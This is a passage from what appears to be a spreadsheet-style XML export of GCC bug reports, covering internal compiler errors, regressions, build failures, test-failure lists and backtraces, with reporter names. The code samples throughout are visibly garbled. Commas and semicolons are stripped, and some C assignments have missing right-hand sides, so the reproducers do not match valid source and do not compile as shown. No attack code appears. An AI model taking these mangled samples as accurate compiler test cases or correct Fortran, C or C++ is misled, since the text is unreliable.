  SUBROUTINE dbcsr_assert(right error)
    LOGICAL INTENT(IN)                      :: right
    TYPE(dbcsr_error_type) INTENT(inout)    :: error
  END SUBROUTINE 
  FUNCTION dbcsr_buffers_get_num (buffers) RESULT (nbuffers)
    TYPE(dbcsr_block_buffer_obj) INTENT(IN) :: buffers
    TYPE(dbcsr_error_type)                   :: error
    CALL dbcsr_assert (.TRUE. error)
    nbuffers = SIZE (buffers%b%buffers)
  END FUNCTION dbcsr_buffers_get_num
  SUBROUTINE dbcsr_buffers_flush (buffers)
    TYPE(dbcsr_block_buffer_obj) &amp;
      INTENT(INOUT)                          :: buffers
       DO ibuff = 1 dbcsr_buffers_get_num(buffers)
       ENDDO
  END SUBROUTINE dbcsr_buffers_flush
END MODULE</t>
  </si>
  <si>
    <t>GCC-17612</t>
  </si>
  <si>
    <t>ICE in gfortran</t>
  </si>
  <si>
    <t>Daily gfortran build downloaded on 22 sep. 2004 for 
Linux i686 
$ gfc --version 
GNU Fortran 95 (GCC 4.0.0 20040922 (experimental)) 
Copyright (C) 2003 Free Software Foundation Inc. 
$ gfc -c bug.f90 
bug.f90: In function 'nullify_pseudo_upf': 
bug.f90:76: internal compiler error: Segmentation fault 
$ cat bug.f90 
      MODULE pseudo_types 
        IMPLICIT NONE 
        INTEGER PARAMETER :: dbl = selected_real_kind(14200) 
        SAVE 
        TYPE pseudo_upf 
          CHARACTER(LEN=80):: generated   !  
          CHARACTER(LEN=80):: date_author ! Misc info 
          CHARACTER(LEN=80):: comment     ! 
          CHARACTER(LEN=2) :: psd       ! Element label 
          CHARACTER(LEN=20) :: typ      ! Pseudo type ( NC or US ) 
          LOGICAL  :: tvanp             ! .true. if Ultrasoft 
          LOGICAL :: nlcc               ! Non linear core corrections 
          CHARACTER(LEN=20) :: dft      ! Exch-Corr type 
          REAL(dbl) :: zp               ! z valence 
          REAL(dbl) :: etotps           ! total energy 
          REAL(dbl) :: ecutwfc          ! suggested cut-off for wfc 
          REAL(dbl) :: ecutrho          ! suggested cut-off for rho 
          LOGICAL :: has_so             ! if .true. includes spin-orbit 
          REAL(dbl) :: xmin             ! the minimum x of the linear mesh 
          REAL(dbl) :: rmax             ! the maximum radius of the mesh 
          REAL(dbl) :: zmesh            ! the nuclear charge used for mesh 
          REAL(dbl) :: dx               ! the deltax of the linear mesh 
          INTEGER POINTER :: nn(:)      ! nn(nwfc) 
          REAL(dbl) POINTER :: rcut(:)  ! cut-off radius(nwfc) 
          REAL(dbl) POINTER :: rcutus(:)! cut-off ultrasoft radius (nwfc) 
          REAL(dbl) POINTER :: epseu(:) ! energy (nwfc) 
          REAL(dbl) POINTER :: jchi(:)  ! jchi(nwfc) 
          REAL(dbl) POINTER :: jjj(:)   ! jjj(nbeta) 
          INTEGER :: nv                 ! UPF file version number 
          INTEGER :: lmax               ! maximum angular momentum component 
          INTEGER :: mesh               ! number of point in the radial mesh 
          INTEGER :: nwfc               ! number of wavefunctions 
          INTEGER :: nbeta              ! number of projectors 
          CHARACTER(LEN=2) POINTER :: els(:)  ! els(nwfc) 
          INTEGER POINTER :: lchi(:)   ! lchi(nwfc) 
          REAL(dbl) POINTER :: oc(:)   ! oc(nwfc) 
          REAL(dbl) POINTER :: r(:)    ! r(mesh) 
          REAL(dbl) POINTER :: rab(:)  ! rab(mesh) 
          REAL(dbl) POINTER :: rho_atc(:) ! rho_atc(mesh) 
          REAL(dbl) POINTER :: vloc(:)    ! vloc(mesh) 
          INTEGER POINTER :: lll(:)       ! lll(nbeta) 
          INTEGER POINTER :: kkbeta(:)    ! kkbeta(nbeta) 
          REAL(dbl) POINTER :: beta(::)  ! beta(meshnbeta) 
          INTEGER :: nd 
          REAL(dbl) POINTER :: dion(::)  ! dion(nbetanbeta) 
          INTEGER :: nqf 
          INTEGER :: nqlc 
          REAL(dbl) POINTER :: rinner(:)  ! rinner(0:2*lmax) 
          REAL(dbl) POINTER :: qqq(::)   ! qqq(nbetanbeta) 
          REAL(dbl) POINTER :: qfunc(:::) ! qfunc(meshnbetanbeta) 
          REAL(dbl) POINTER :: qfcoef(::::) ! 
          REAL(dbl) POINTER :: chi(::) !  chi(meshnwfc) 
          REAL(dbl) POINTER :: rho_at(:) !  rho_at(mesh) 
        END TYPE 
      CONTAINS 
        SUBROUTINE nullify_pseudo_upf( upf ) 
          TYPE( pseudo_upf ) INTENT(INOUT) :: upf 
          NULLIFY( upf%els upf%lchi upf%jchi upf%oc ) 
          NULLIFY( upf%r upf%rab )   
          NULLIFY( upf%rho_atc upf%vloc )   
          NULLIFY( upf%nn upf%rcut) 
          NULLIFY( upf%rcutus upf%epseu) 
          NULLIFY( upf%lll upf%jjj upf%kkbeta upf%beta upf%dion )   
          NULLIFY( upf%rinner upf%qqq upf%qfunc upf%qfcoef )   
          NULLIFY( upf%chi )   
          NULLIFY( upf%rho_at )   
          RETURN 
        END SUBROUTINE 
      END MODULE pseudo_types</t>
  </si>
  <si>
    <t>giannozz</t>
  </si>
  <si>
    <t>GCC-21347</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] spurious warning with -Wctor-dtor-privacy</t>
  </si>
  <si>
    <t>cat &gt; foo.cpp &lt;&lt; EOF
class A {
    public:
    int x
    int getX() { return x } // comment out to avoid warning
}
int foo() {
    A a // accepted: clearly the ctor is not private
    return a.x
}
EOF
g++ -c -Wctor-dtor-privacy foo.cpp
foo.cpp:1: warning: 'class A' only defines private constructors and has no friends
This occurs in 4.0.0 and is a regression from 3.3.5 and 3.4.3.</t>
  </si>
  <si>
    <t>GCC-46997</t>
  </si>
  <si>
    <t>new ia64 vector instructions are broken on HP-UX (big-endian)</t>
  </si>
  <si>
    <t>The new IA64 vector instructions added in version r167136 don't work on
HP-UX.  This is probably because HP-UX is big-endian while Linux is
little-endian.
Some of the failing tests include:
FAIL: gcc.dg/vect/fast-math-vect-complex-3.c execution test
FAIL: gcc.dg/vect/fast-math-vect-complex-3.c execution test
FAIL: gcc.dg/vect/no-scevccp-outer-10a.c execution test
FAIL: gcc.dg/vect/no-scevccp-outer-10a.c execution test
FAIL: gcc.dg/vect/no-scevccp-outer-10b.c execution test
FAIL: gcc.dg/vect/no-scevccp-outer-10b.c execution test
FAIL: gcc.dg/vect/no-scevccp-outer-18.c execution test
FAIL: gcc.dg/vect/no-scevccp-outer-18.c execution test
FAIL: gcc.dg/vect/no-scevccp-outer-20.c execution test
FAIL: gcc.dg/vect/no-scevccp-outer-20.c execution test
FAIL: gcc.dg/vect/no-scevccp-outer-21.c execution test
FAIL: gcc.dg/vect/no-scevccp-outer-21.c execution test
FAIL: gcc.dg/vect/pr37539.c execution test
FAIL: gcc.dg/vect/pr37539.c execution test
FAIL: gcc.dg/vect/slp-11.c execution test
FAIL: gcc.dg/vect/slp-11.c execution test
FAIL: gcc.dg/vect/slp-12a.c execution test
FAIL: gcc.dg/vect/slp-12a.c execution test
FAIL: gcc.dg/vect/slp-13.c execution test
FAIL: gcc.dg/vect/slp-13.c execution test
FAIL: gcc.dg/vect/slp-19.c execution test
FAIL: gcc.dg/vect/slp-19.c execution test
FAIL: gcc.dg/vect/slp-21.c execution test
FAIL: gcc.dg/vect/slp-21.c execution test
FAIL: gcc.dg/vect/slp-23.c execution test
FAIL: gcc.dg/vect/slp-23.c execution test
FAIL: gcc.dg/vect/slp-multitypes-10.c execution test
FAIL: gcc.dg/vect/slp-multitypes-10.c execution test
FAIL: gcc.dg/vect/slp-multitypes-6.c execution test
FAIL: gcc.dg/vect/slp-multitypes-6.c execution test
FAIL: gcc.dg/vect/slp-multitypes-9.c execution test
FAIL: gcc.dg/vect/slp-multitypes-9.c execution test
FAIL: gcc.dg/vect/slp-perm-2.c execution test
FAIL: gcc.dg/vect/slp-perm-2.c execution test
FAIL: gcc.dg/vect/slp-perm-3.c execution test
FAIL: gcc.dg/vect/slp-perm-3.c execution test
FAIL: gcc.dg/vect/slp-reduc-3.c execution test
FAIL: gcc.dg/vect/slp-reduc-3.c execution test
FAIL: gcc.dg/vect/slp-reduc-6.c execution test
FAIL: gcc.dg/vect/slp-reduc-6.c execution test
FAIL: gcc.dg/vect/vect-107.c execution test
FAIL: gcc.dg/vect/vect-107.c execution test
FAIL: gcc.dg/vect/vect-116.c execution test
FAIL: gcc.dg/vect/vect-116.c execution test
FAIL: gcc.dg/vect/vect-35.c execution test
FAIL: gcc.dg/vect/vect-35.c execution test
FAIL: gcc.dg/vect/vect-double-reduc-5.c execution test
FAIL: gcc.dg/vect/vect-double-reduc-5.c execution test
FAIL: gcc.dg/vect/vect-iv-4.c execution test
FAIL: gcc.dg/vect/vect-iv-4.c execution test
FAIL: gcc.dg/vect/vect-iv-8.c execution test
FAIL: gcc.dg/vect/vect-iv-8.c execution test
FAIL: gcc.dg/vect/vect-iv-8a.c execution test
FAIL: gcc.dg/vect/vect-iv-8a.c execution test
FAIL: gcc.dg/vect/vect-multitypes-14.c execution test
FAIL: gcc.dg/vect/vect-multitypes-14.c execution test
FAIL: gcc.dg/vect/vect-multitypes-8.c execution test
FAIL: gcc.dg/vect/vect-multitypes-8.c execution test
FAIL: gcc.dg/vect/vect-shift-2.c execution test
FAIL: gcc.dg/vect/vect-shift-2.c execution test
FAIL: gcc.dg/vect/vect-strided-a-mult.c execution test
FAIL: gcc.dg/vect/vect-strided-a-mult.c execution test
FAIL: gcc.dg/vect/vect-strided-a-u16-i2.c execution test
FAIL: gcc.dg/vect/vect-strided-a-u16-i2.c execution test
FAIL: gcc.dg/vect/vect-strided-a-u16-i4.c execution test
FAIL: gcc.dg/vect/vect-strided-a-u16-i4.c execution test
FAIL: gcc.dg/vect/vect-strided-a-u16-mult.c execution test
FAIL: gcc.dg/vect/vect-strided-a-u16-mult.c execution test
FAIL: gcc.dg/vect/vect-strided-a-u32-mult.c execution test
FAIL: gcc.dg/vect/vect-strided-a-u32-mult.c execution test
FAIL: gcc.dg/vect/vect-strided-a-u8-i2-gap.c execution test
FAIL: gcc.dg/vect/vect-strided-a-u8-i2-gap.c execution test
FAIL: gcc.dg/vect/vect-strided-a-u8-i8-gap2.c execution test
FAIL: gcc.dg/vect/vect-strided-a-u8-i8-gap2.c execution test
FAIL: gcc.dg/vect/vect-strided-a-u8-i8-gap7.c execution test
FAIL: gcc.dg/vect/vect-strided-a-u8-i8-gap7.c execution test
FAIL: gcc.dg/vect/vect-strided-float.c execution test
FAIL: gcc.dg/vect/vect-strided-float.c execution test
FAIL: gcc.dg/vect/vect-strided-mult-char-ls.c execution test
FAIL: gcc.dg/vect/vect-strided-mult-char-ls.c execution test
FAIL: gcc.dg/vect/vect-strided-mult.c execution test
FAIL: gcc.dg/vect/vect-strided-mult.c execution test
FAIL: gcc.dg/vect/vect-strided-same-dr.c execution test
FAIL: gcc.dg/vect/vect-strided-same-dr.c execution test
FAIL: gcc.dg/vect/vect-strided-store-a-u8-i2.c execution test
FAIL: gcc.dg/vect/vect-strided-store-a-u8-i2.c execution test
FAIL: gcc.dg/vect/vect-strided-store-u16-i4.c execution test
FAIL: gcc.dg/vect/vect-strided-store-u16-i4.c execution test
FAIL: gcc.dg/vect/vect-strided-store-u32-i2.c execution test
FAIL: gcc.dg/vect/vect-strided-store-u32-i2.c execution test
FAIL: gcc.dg/vect/vect-strided-u16-i2.c execution test
FAIL: gcc.dg/vect/vect-strided-u16-i2.c execution test
FAIL: gcc.dg/vect/vect-strided-u16-i4.c execution test
FAIL: gcc.dg/vect/vect-strided-u16-i4.c execution test
FAIL: gcc.dg/vect/vect-strided-u32-i4.c execution test
FAIL: gcc.dg/vect/vect-strided-u32-i4.c execution test
FAIL: gcc.dg/vect/vect-strided-u32-i8.c execution test
FAIL: gcc.dg/vect/vect-strided-u32-i8.c execution test
FAIL: gcc.dg/vect/vect-strided-u32-mult.c execution test
FAIL: gcc.dg/vect/vect-strided-u32-mult.c execution test
FAIL: gcc.dg/vect/vect-strided-u8-i2.c execution test
FAIL: gcc.dg/vect/vect-strided-u8-i2.c execution test
FAIL: gcc.dg/vect/vect-strided-u8-i8-gap7.c execution test
FAIL: gcc.dg/vect/vect-strided-u8-i8-gap7.c execution test
FAIL: gcc.dg/vect/vect-strided-u8-i8.c execution test
FAIL: gcc.dg/vect/vect-strided-u8-i8.c execution test
FAIL: gcc.dg/vect/vect-vfa-03.c execution test
FAIL: gcc.dg/vect/vect-vfa-03.c execution test</t>
  </si>
  <si>
    <t>GCC-55233</t>
  </si>
  <si>
    <t>libstdc++ atomic does not support hle_acquire/release</t>
  </si>
  <si>
    <t>The underlying __atomic_* C intrinsics support TSX HLE ACQUIRE/RELEASE but libstdc++ atomic does not define the enum values or mask the bits.
However extending the libstdc++ enum may run into a variant of PR55139</t>
  </si>
  <si>
    <t>GCC-9690</t>
  </si>
  <si>
    <t>[hpux] Fail to build binutils-2.12 with gcc-3.2.2</t>
  </si>
  <si>
    <t>After issuing the command:
  make -w all install
I've received the message:
/auto/gabellin/prova/src/binutils-2.12/bfd/archive.c: In function `_bfd_write_archive_contents':
/auto/gabellin/prova/src/binutils-2.12/bfd/archive.c:1832: unrecognizable insn:
(insn 1071 1069 1073 (set (reg:SI 1 %r1)
        (plus:SI (reg/f:SI 30 %r30)
            (high:SI (const_int 8448 [0x2100])))) -1 (nil)
    (nil))
/auto/gabellin/prova/src/binutils-2.12/bfd/archive.c:1832: Internal compiler error in extract_insn at recog.c:2148
Please submit a full bug report
with preprocessed source if appropriate.
Release:
3.2.2
Environment:
HP-UX horn B.11.00 U 9000/800 593790578 unlimited-user license
host: hppa2.0w-hp-hpux11.00$
build: hppa2.0w-hp-hpux11.00$
target: hppa2.0w-hp-hpux11.00$
configured with: /auto/gabellin/prova/src/gcc-3.2.2/configure --prefix=/auto/gab
ellin/tools --enable-languages=c -v$
How-To-Repeat:
gcc -c archive.i</t>
  </si>
  <si>
    <t>claudio.gabellini</t>
  </si>
  <si>
    <t>GCC-53113</t>
  </si>
  <si>
    <t>Build fails in x86_avx.cc if AVX disabled by -mno-avx but supported by as</t>
  </si>
  <si>
    <t>4.7.0 fails to bootstrap on x86_64 (tested on Solaris 10 and CentOS 5.5) if the CPU doesn't support AVX (Xeon E5420) but the assembler (GNU as 2.22) does. For campatibility reasons I'm using -march=core2 and GCC 4.6.3 builds without any problem with the same build script.
checking whether /opt/SP/build/gcc/gcc-4.7.0/host-x86_64-unknown-linux-gnu/gcc/xgcc -B/opt/SP/build/gcc/gcc-4.7.0/host-x86_64-unknown-linux-gnu/gcc/ -B/opt/SP/gcc/gcc-4.7.0/x86_64-unknown-linux-gnu/bin/ -B/opt/SP/gcc/gcc-4.7.0/x86_64-unknown-linux-gnu/lib/ -isystem /opt/SP/gcc/gcc-4.7.0/x86_64-unknown-linux-gnu/include -isystem /opt/SP/gcc/gcc-4.7.0/x86_64-unknown-linux-gnu/sys-include  -m32 and cc understand -c and -o together... ../.././libitm/config/x86/x86_avx.cc:83:1: error: Ã¢_ITM_TYPE_M256Ã¢ does not name a type
../.././libitm/config/x86/x86_avx.cc:83:1: error: Ã¢_ITM_TYPE_M256Ã¢ does not name a type
../.././libitm/config/x86/x86_avx.cc:83:1: error: Ã¢_ITM_TYPE_M256Ã¢ does not name a type
../.././libitm/config/x86/x86_avx.cc:83:1: error: Ã¢_ITM_TYPE_M256Ã¢ does not name a type
../.././libitm/config/x86/x86_avx.cc:83:1: error: variable or field Ã¢_ITM_WM256Ã¢ declared void
../.././libitm/config/x86/x86_avx.cc:83:1: error: Ã¢_ITM_TYPE_M256Ã¢ was not declared in this scope
../.././libitm/config/x86/x86_avx.cc:83:1: error: Ã¢ptrÃ¢ was not declared in this scope
../.././libitm/config/x86/x86_avx.cc:83:1: error: Ã¢_ITM_TYPE_M256Ã¢ was not declared in this scope
../.././libitm/config/x86/x86_avx.cc:83:1: error: variable or field Ã¢_ITM_WaRM256Ã¢ declared void
../.././libitm/config/x86/x86_avx.cc:83:1: error: Ã¢_ITM_TYPE_M256Ã¢ was not declared in this scope
../.././libitm/config/x86/x86_avx.cc:83:1: error: Ã¢ptrÃ¢ was not declared in this scope
../.././libitm/config/x86/x86_avx.cc:83:1: error: Ã¢_ITM_TYPE_M256Ã¢ was not declared in this scope
../.././libitm/config/x86/x86_avx.cc:83:1: error: variable or field Ã¢_ITM_WaWM256Ã¢ declared void
../.././libitm/config/x86/x86_avx.cc:83:1: error: Ã¢_ITM_TYPE_M256Ã¢ was not declared in this scope
../.././libitm/config/x86/x86_avx.cc:83:1: error: Ã¢ptrÃ¢ was not declared in this scope
../.././libitm/config/x86/x86_avx.cc:83:1: error: Ã¢_ITM_TYPE_M256Ã¢ was not declared in this scope
../.././libitm/config/x86/x86_avx.cc:86:19: error: Ã¢_ITM_TYPE_M256Ã¢ does not name a type
../.././libitm/config/x86/x86_avx.cc:86:35: error: ISO C++ forbids declaration of Ã¢ptrÃ¢ with no type [-fpermissive]
gmake[4]: *** [x86_avx.lo] Error 1
gmake[4]: Leaving directory `/opt/SP/build/gcc/gcc-4.7.0/x86_64-unknown-linux-gnu/libitm'
I'm not a programmer but on a first look the declaration of _ITM_TYPE_M256 seems to be missing if __AVX__ is not set but HAVE_AS_AVX:
./libitm/libitm.h
# ifdef __AVX__
  typedef float _ITM_TYPE_M256 __attribute__((vector_size(32) may_alias))
  ITM_BARRIERS(M256)
  ITM_LOG(M256)
# endif
./libitm/config/x86/x86_avx.cc
#ifndef HAVE_AS_AVX
// If we don't have an AVX capable assembler we didn't set -mavx on the
// command-line either which means that libitm.h defined neither this type
// nor the functions in this file.  Define the type and unconditionally
// wrap the file in extern C to make up for the lack of pre-declaration.
typedef float _ITM_TYPE_M256 __attribute__((vector_size(32) may_alias))
#endif
But simply adding the definition (if defined(__AVX__) || defined(HAVE_AS_AVX)) just leads to an avx vector argument without avx enabled changes the abi error. As said above I'm not a programmer.
Adding -mno-avx does not change anything. I would expect AVX to be completely disabled if CPU and target architecture do not support it?</t>
  </si>
  <si>
    <t>windward</t>
  </si>
  <si>
    <t>GCC-54730</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] ICE in gfc_typenode_for_spec at fortran/trans-types.c:1066</t>
  </si>
  <si>
    <t>Reported by Paul Kapinos at:
http://gcc.gnu.org/ml/fortran/2012-09/msg00095.html
Test case:
  implicit none
  intrinsic :: real
  real :: vec(1:2)
  vec = (/ real(a = 1) 1. /)
end
gfortran 4.7 and trunk yield the following ICE:
internal compiler error: in gfc_typenode_for_spec at fortran/trans-types.c:1066</t>
  </si>
  <si>
    <t>GCC-38236</t>
  </si>
  <si>
    <t>[4.4 Regression] SMT aliases incomplete</t>
  </si>
  <si>
    <t>struct X { int i }
int __attribute__((noinline))
foo (struct X *p int *q int a int b)
{
  struct X x y
  if (a)
    p = 
  if (b)
    q = 
  else
    q = 
  *q = 1
  return p-&gt;i
}
extern void abort (void)
int main()
{
  if (foo((void *)0 (void *)0 1 1) != 1)
    abort ()
  return 0
}
is miscompiled (the store to *q is deleted as unused) because the SMT used
for *p misses the x and y aliases as x and y are neither directly stored
nor is their SMT (but only the aliasing SMT for int).</t>
  </si>
  <si>
    <t>GCC-11808</t>
  </si>
  <si>
    <t>[3.4 regression] Wrong namespace lookup for template function when induced by a template parameter</t>
  </si>
  <si>
    <t xml:space="preserve">
This is a refinement of PR c++/11744 which was fixed the
2003-08-01. The bug is still present when the function call is
actually a call to a function template:
namespace nsp_foo {
  struct A {}
  struct foo {}
}
namespace nsp_bar {
  template  // PR 11744 fixed the case where foo took
  void foo(T) {}     // a nsp_foo::A parameter.
  template 
  void bar(T t)
  {
    nsp_bar::foo(t)
  }
}
int main()
{
  nsp_bar::bar(nsp_foo::A())
}
Here is g++-3.4 output:
namespaces.cc: In function `void nsp_bar::bar(T) [with T = nsp_foo::A]':
namespaces.cc:24:   instantiated from here
namespaces.cc:5: error: `struct nsp_foo::foo' is not a function
namespaces.cc:12: error:   conflict with `template void
   nsp_bar::foo(T)'
namespaces.cc:17: error:   in call to `foo'
g++-3.3 and above como and icc accepts this code.
Environment:
System: Linux meissa 2.4.21 #1 Sat Jul 26 02:06:42 CEST 2003 i686 GNU/Linux
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /home/nes/work/lrde/ext/gcc/configure --prefix=/opt/gcc-3.4 --enable-languages=cc++ : (reconfigured)
How-To-Repeat:
Compile the given code.</t>
  </si>
  <si>
    <t>nicolas.burrus</t>
  </si>
  <si>
    <t>GCC-51566</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE: verify_gimple in testsuite/g++.dg/ipa/iinline-3.C</t>
  </si>
  <si>
    <t>$ cc1plus /work/local-checkouts/gcc-fsf/gcc/testsuite/g++.dg/ipa/iinline-3.C -O3 -quiet
/work/local-checkouts/gcc-fsf/gcc/testsuite/g++.dg/ipa/iinline-3.C: In function 'int main(int char**)':
/work/local-checkouts/gcc-fsf/gcc/testsuite/g++.dg/ipa/iinline-3.C:55:5: error: statement marked for throw but doesn't
D.4744_64 = String::funcOne (
/work/local-checkouts/gcc-fsf/gcc/testsuite/g++.dg/ipa/iinline-3.C:55:5: internal compiler error: verify_gimple failed
Trace:
#0  internal_error (gmsgid=0x1692398 verify_gimple failed) at /work/local-checkouts/gcc-fsf/gcc/diagnostic.c:843
#1  0x0000000000e5b5e0 in verify_gimple_in_cfg (fn=0x7ffff7666780) at /work/local-checkouts/gcc-fsf/gcc/tree-cfg.c:4582
#2  0x000000000106a0f1 in verify_ssa (check_modified_stmt=1 '\001') at /work/local-checkouts/gcc-fsf/gcc/tree-ssa.c:928
#3  0x0000000000d3b219 in execute_function_todo (data=0x22) at /work/local-checkouts/gcc-fsf/gcc/passes.c:1725
#4  0x0000000000d3ac3e in do_per_function (callback=0xd3b0ae  data=0x22) at /work/local-checkouts/gcc-fsf/gcc/passes.c:1563
#5  0x0000000000d3b311 in execute_todo (flags=34) at /work/local-checkouts/gcc-fsf/gcc/passes.c:1756
#6  0x0000000000d3bc2c in execute_one_pass (pass=0x1c124c0) at /work/local-checkouts/gcc-fsf/gcc/passes.c:2102
#7  0x0000000000d3bd57 in execute_pass_list (pass=0x1c124c0) at /work/local-checkouts/gcc-fsf/gcc/passes.c:2134
#8  0x0000000000d3bd78 in execute_pass_list (pass=0x1c123a0) at /work/local-checkouts/gcc-fsf/gcc/passes.c:2135
#9  0x0000000000d3bd78 in execute_pass_list (pass=0x1c11aa0) at /work/local-checkouts/gcc-fsf/gcc/passes.c:2135
#10 0x0000000000edfcc2 in tree_rest_of_compilation (fndecl=0x7ffff753d600) at /work/local-checkouts/gcc-fsf/gcc/tree-optimize.c:421
#11 0x00000000009b84e5 in cgraph_expand_function (node=0x7ffff7542900) at /work/local-checkouts/gcc-fsf/gcc/cgraphunit.c:1818
#12 0x00000000009b86b0 in cgraph_expand_all_functions () at /work/local-checkouts/gcc-fsf/gcc/cgraphunit.c:1885
#13 0x00000000009b91f1 in cgraph_optimize () at /work/local-checkouts/gcc-fsf/gcc/cgraphunit.c:2198
#14 0x00000000009b6232 in cgraph_finalize_compilation_unit () at /work/local-checkouts/gcc-fsf/gcc/cgraphunit.c:1327
#15 0x0000000000685ca8 in cp_write_global_declarations () at /work/local-checkouts/gcc-fsf/gcc/cp/decl2.c:4050
#16 0x0000000000e2ddee in compile_file () at /work/local-checkouts/gcc-fsf/gcc/toplev.c:573
#17 0x0000000000e2ffea in do_compile () at /work/local-checkouts/gcc-fsf/gcc/toplev.c:1928
#18 0x0000000000e30161 in toplev_main (argc=4 argv=0x7fffffffe458) at /work/local-checkouts/gcc-fsf/gcc/toplev.c:2004
#19 0x00000000008e8dac in main (argc=4 argv=0x7fffffffe458) at /work/local-checkouts/gcc-fsf/gcc/main.c:36
Trunk r182338 configured with --target=arm-none-eabi -cpu=cortex-a9 --with-fpu=neon --with-float=softfp.</t>
  </si>
  <si>
    <t>GCC-79230</t>
  </si>
  <si>
    <t>[7 Regression] [OOP] Run time error: double free or corruption</t>
  </si>
  <si>
    <t>Created attachment 40580
Unit test suite that experiences the run time error.
The following case (part of our unit test suite) throws run time errors (61 out of 110 tests) and _all_ of the functional tests. I assume that they are all related to the same 'feature' (change in the gfortran code). In the tarball do 
make and then 
./rt_error --check evaluators
Using r244868 all older gfortran versions since 4.8.5 are working. 
The code is rather lengthy (but still not the complete testsuite). I try to provide 
a smaller test case if possible but also a complete test suite. 
This is the error:
Running test: evaluator_1rt_error(565420x7fffb05123c0) malloc: *** error for object 0x7fb4ebf00110: pointer being freed was not allocated
*** set a breakpoint in malloc_error_break to debug
Program received signal SIGABRT: Process abort signal.
Backtrace for this error:
#0  0x10cdfd7c9
#1  0x10cdfcb63
#2  0x7fffa78d2bb9
Abort trap: 6
Up to now I couldn't produce a proper backtrace.</t>
  </si>
  <si>
    <t>GCC-69261</t>
  </si>
  <si>
    <t>[6 Regression] Copying char arrays during constexpr evaluation does not work reliably</t>
  </si>
  <si>
    <t>Created attachment 37331
Preprocessed source code
I was playing around with string processing for constexpr values and wrote the following program to concatenate two strings at compile time:
#include 
#include 
#include 
using std::size_t
template
struct string_constexpr
{   
    constexpr string_constexpr() = default
    template
    constexpr string_constexpr( char const (&amp;d)[M] ):
        data{0}
    {
        static_assert( M &lt;= N size! )
		for(size_t i=0 i != M i++)
		{
			data[i] = d[i]
		}
    }
	char data[N]
}
template 
T&amp; operator const&amp; str)
{
    return (stream &lt;&lt; str.data)
}
template
constexpr string_constexpr s( char const (&amp;d)[N] )
{
    string_constexpr c{}
	for(size_t i=0 i != N i++)
	{
		c.data[i] = d[i]
	}
    return c
}
template
constexpr auto concat(string_constexpr const&amp; s1 string_constexpr const&amp; s2)
{
	string_constexpr s( s1.data )
	for(size_t i=0 i != M i++)
	{
		s.data[N+i-1] = s2.data[i]
	}
	return s
}
template
constexpr auto concat(char const (&amp;x)[N] char const (&amp;y)[M])
{
	string_constexpr tmp{x}
	for(size_t i=0 i != M i++)
	{
		tmp.data[N+i-1] = y[i]
	}
	return tmp
}
void foo()
{
   auto constexpr s1 = s( bla )
   auto constexpr s2 = s( blub )
   string_constexpr constexpr s1s2 = concat(s1s2)
   auto constexpr c = concat(bla blub)
   std::cout &lt;&lt; s1.data &lt;&lt; std::endl &lt;&lt; s2.data &lt;&lt; std::endl &lt;&lt; s1s2.data &lt;&lt; std::endl &lt;&lt; c &lt;&lt; std::endl
}
int main()
{
foo()
return 0
}
Executables compiled with GCC and clang produce different outputs and I think clang is right:
$ g++ -std=c++1y static_strings.cpp
$ ./a.out
bla
blub
blablub
$ clang++ -std=c++1y static_strings.cpp
$ ./a.out 
bla
blub
blablub
blablub</t>
  </si>
  <si>
    <t>jens.auer</t>
  </si>
  <si>
    <t>GCC-80618</t>
  </si>
  <si>
    <t>[8 regression] test case gcc.dg/pr50310-2.c fails with ICE starting with 247544</t>
  </si>
  <si>
    <t>spawn /home/seurer/gcc/build/gcc-trunk/gcc/xgcc -B/home/seurer/gcc/build/gcc-trunk/gcc/ /home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/pr50310-2.c -fno-diagnostics-show-caret -fdiagnostics-color=never -O3 -lm -o ./pr50310-2.exe
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/pr50310-2.c: In function 'main':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/pr50310-2.c:47:1: error: unrecognizable insn:
(insn 361 360 176 2 (set (reg:V2DF 342)
        (not:V2DF (ior:V2DF (reg:V2DF 470)
                (reg:V2DF 471)))) /home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/pr50310-2.c:30 -1
     (nil))
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/pr50310-2.c:47:1: internal compiler error: in extract_insn at recog.c:2311
0x1087afb3 _fatal_insn(char const* rtx_def const* char const* int char const*)
	/home/seurer/gcc/gcc-trunk/gcc/rtl-error.c:108
0x1087b017 _fatal_insn_not_found(rtx_def const* char const* int char const*)
	/home/seurer/gcc/gcc-trunk/gcc/rtl-error.c:116
0x1083f6b7 extract_insn(rtx_insn*)
	/home/seurer/gcc/gcc-trunk/gcc/recog.c:2311
0x111c4b87 decompose_multiword_subregs
	/home/seurer/gcc/gcc-trunk/gcc/lower-subreg.c:1467
0x111c62cb execute
	/home/seurer/gcc/gcc-trunk/gcc/lower-subreg.c:1734
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
compiler exited with status 1
output is:
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/pr50310-2.c: In function 'main':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/pr50310-2.c:47:1: error: unrecognizable insn:
(insn 361 360 176 2 (set (reg:V2DF 342)
        (not:V2DF (ior:V2DF (reg:V2DF 470)
                (reg:V2DF 471)))) /home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/pr50310-2.c:30 -1
     (nil))
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/pr50310-2.c:47:1: internal compiler error: in extract_insn at recog.c:2311
0x1087afb3 _fatal_insn(char const* rtx_def const* char const* int char const*)
	/home/seurer/gcc/gcc-trunk/gcc/rtl-error.c:108
0x1087b017 _fatal_insn_not_found(rtx_def const* char const* int char const*)
	/home/seurer/gcc/gcc-trunk/gcc/rtl-error.c:116
0x1083f6b7 extract_insn(rtx_insn*)
	/home/seurer/gcc/gcc-trunk/gcc/recog.c:2311
0x111c4b87 decompose_multiword_subregs
	/home/seurer/gcc/gcc-trunk/gcc/lower-subreg.c:1467
0x111c62cb execute
	/home/seurer/gcc/gcc-trunk/gcc/lower-subreg.c:1734
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
